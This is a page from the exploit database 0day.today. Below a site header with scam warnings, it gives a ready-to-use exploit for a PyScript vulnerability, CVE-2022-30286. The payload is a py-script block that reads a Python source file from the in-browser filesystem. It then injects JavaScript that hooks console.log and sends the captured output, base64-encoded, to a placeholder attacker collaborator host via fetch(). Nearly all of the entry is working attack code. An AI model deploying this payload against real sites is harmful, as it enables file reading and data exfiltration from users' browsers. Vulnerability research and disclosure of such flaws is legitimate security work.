0day.today - 世界最大的漏洞利用数据库。
0day.today 用户须知:
本站管理员使用官方账号。请谨防诈骗!
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币 金币
本站管理员使用官方账号。请谨防诈骗!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PyScript - Read Remote Python Source Code Vulnerability
# Exploit Title: PyScript Remote Emscripten VMemory Python libraries Source Codes Read # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://pyscript.net/ # Software Link: https://github.com/pyscript/pyscript # Version: 2022-05-04-Alpha # Tested on: Ubuntu Apache Server # CVE : CVE-2022-30286 <py-script> x = "CyberGuy" if x == "CyberGuy": with open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read() print(contents) print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>') </py-script> # 0day.today [2024-06-30] #